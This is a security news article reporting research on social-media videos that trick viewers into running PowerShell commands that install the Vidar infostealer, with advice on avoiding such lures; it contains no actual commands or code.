Hackers Use Free Spotify Premium Hacks on TikTok and Instagram to Spread Vidar Infostealer

Hackers are now turning popular social media platforms into malware delivery channels, using the promise of free software to trap unsuspecting users.

Short-form video platforms like TikTok and Instagram Reels have become the latest tools in a cybercriminal’s playbook, with attackers posting polished tutorial videos that promise free Spotify Premium, free Windows activation, or free Microsoft Office.

Instead of the freebies they are after, viewers end up with a dangerous infostealer quietly running on their Windows devices. The shift marks a clear evolution in how attackers choose to reach their targets.

Cybercriminals have moved far beyond traditional phishing emails. Today, they are crafting content that looks and feels like everyday social media, blending in seamlessly with legitimate tech tips and tutorials.

The videos are so well-produced that many viewers do not suspect anything is wrong until the damage is already done. This approach lets attackers reach millions of people through the very platforms those people trust most.

Researchers at ReversingLabs uncovered two active campaigns using these short videos to trick users into running dangerous PowerShell commands or visiting malicious download sites.

Cybercriminals are learning to exploit social media algorithms just as effectively as professional marketers, amplifying the reach of these attacks at almost no cost.

The malware at the center of these campaigns is Vidar, a well-known infostealer built to quietly siphon sensitive data from infected devices.

Once it lands on a machine, Vidar goes to work collecting saved browser passwords, autofill data, browser cookies, cryptocurrency wallet details, two-factor authentication data, and even TOR browser data.

Everything harvested is then sent back to servers controlled by the attackers, giving them a detailed key to the victim’s entire digital life.

Hackers Use Free Spotify Premium Hacks

The first campaign is deceptively polished. Accounts using names like “windows.tips” or “windows.insights” post videos designed to look like genuine tech support content, complete with Windows-style branding and professional editing.

The videos are tagged with Windows and Office-related keywords so they appear right alongside legitimate troubleshooting videos in search results and recommendation feeds.

Viewers are walked through step-by-step instructions that include opening PowerShell, a legitimate Windows administrative tool, and pasting in a set of commands.

Figure 1: Example of a fake Windows tutorial video used to deliver the Vidar infostealer (Image courtesy of ReversingLabs)

Those commands then silently download and execute the Vidar infostealer in the background, with the user none the wiser.

The technique closely mirrors what researchers have called ClickFix attacks, where users are socially engineered into running malicious code themselves, bypassing most traditional security defenses.

Vidar’s Evasion Tricks and Security Risks

Once Vidar is on a device, it does not just steal data and leave. Research into similar TikTok-based attack chains shows that the malicious scripts commonly add exclusions to Windows Defender, effectively blinding the built-in security tool to future threats.

This means even after the initial infection is cleaned up, the device can remain exposed to follow-on attacks.

The stolen information represents a serious risk beyond just one account or one platform. Browser cookies can be used to hijack active sessions without needing a password, and cryptocurrency wallet data can lead to direct financial loss.

Two-factor authentication data in the wrong hands can defeat even accounts that appear to be securely protected.

Security experts recommend downloading software only from official vendor websites and treating any “free” or cracked version of a paid product with real skepticism.

Users should avoid following instructions on unfamiliar web pages, especially those asking them to run commands or paste code, as many of these pages use countdown timers or fake user counters to push people into acting fast.

Checking that downloaded files match what was expected, verifying a file’s digital signature before running it, and keeping a real-time anti-malware solution active are all practical steps that can stop an infostealer before it ever runs.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.